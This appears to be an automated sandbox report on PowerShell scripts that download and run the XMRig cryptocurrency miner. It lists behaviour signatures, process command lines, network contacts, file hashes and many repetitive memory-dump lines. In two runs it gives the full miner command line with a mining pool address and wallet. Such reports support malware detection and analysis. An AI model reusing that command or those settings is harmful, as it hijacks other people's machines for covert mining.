memory/4764-147-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-148-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-149-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-150-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-151-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-152-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-153-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-154-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-155-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-156-0x00007FF672210000-0x00007FF672E43000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:54

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp

Files

memory/1892-0-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdetur5z.nvs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1892-6-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/1892-11-0x00000152E26A0000-0x00000152E26C2000-memory.dmp

memory/1892-13-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/1892-14-0x00000152E2910000-0x00000152E2922000-memory.dmp

memory/1892-15-0x00000152E2680000-0x00000152E268A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/400-46-0x0000023CB3C30000-0x0000023CB3C50000-memory.dmp

memory/400-47-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/400-48-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/1892-50-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/400-49-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/1892-51-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/400-52-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/1892-53-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/400-54-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

memory/400-55-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-56-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-57-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-58-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-59-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-60-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-61-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-62-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-63-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-64-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-65-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-66-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-67-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-68-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-69-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-70-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-71-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-72-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-73-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-74-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-75-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-76-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-77-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-78-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-79-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-80-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-81-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-82-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-83-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-84-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-85-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-86-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-87-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-88-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-89-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-90-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-91-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-92-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-93-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-94-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-95-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-96-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-97-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-98-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-99-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-100-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-101-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-102-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-103-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-104-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-105-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-106-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-107-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-108-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-109-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-110-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-111-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-112-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-113-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

memory/400-114-0x00007FF6FFC40000-0x00007FF700873000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win7-20240215-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

memory/1664-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

memory/1664-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/1664-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1664-5-0x000000001B550000-0x000000001B832000-memory.dmp

memory/1664-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1664-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1664-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1664-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/1664-12-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:18

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 99.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

memory/3572-0-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

memory/3572-6-0x0000021F9E970000-0x0000021F9E992000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wbpjnaxp.kz0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3572-11-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/3572-12-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/3572-14-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/3572-15-0x0000021F9F540000-0x0000021F9F552000-memory.dmp

memory/3572-16-0x0000021F9F520000-0x0000021F9F52A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3884-47-0x0000017CD9AB0000-0x0000017CD9AD0000-memory.dmp

memory/3884-48-0x0000017CD9B00000-0x0000017CD9B20000-memory.dmp

memory/3884-49-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3572-51-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/3884-50-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-53-0x0000017CD9B20000-0x0000017CD9B40000-memory.dmp

memory/3572-52-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

memory/3884-55-0x0000017CD9B40000-0x0000017CD9B60000-memory.dmp

memory/3572-54-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/3884-56-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-57-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-58-0x0000017CD9B20000-0x0000017CD9B40000-memory.dmp

memory/3884-59-0x0000017CD9B40000-0x0000017CD9B60000-memory.dmp

memory/3884-60-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-61-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-62-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-63-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-64-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-65-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-66-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-67-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-68-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-69-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-70-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-71-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-72-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-73-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-74-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-75-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-76-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-77-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-78-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-79-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-80-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-81-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-82-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-83-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-84-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-85-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-86-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-87-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-88-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-89-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-90-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-91-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-92-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-93-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-94-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-95-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-96-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-97-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-98-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-99-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-100-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-101-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-102-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-103-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-104-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-105-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-106-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-107-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-108-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-109-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-110-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-111-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-112-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-113-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-114-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-115-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-116-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-117-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp

memory/3884-118-0x00007FF6BE4D0000-0x00007FF6BF103000-memory.dmp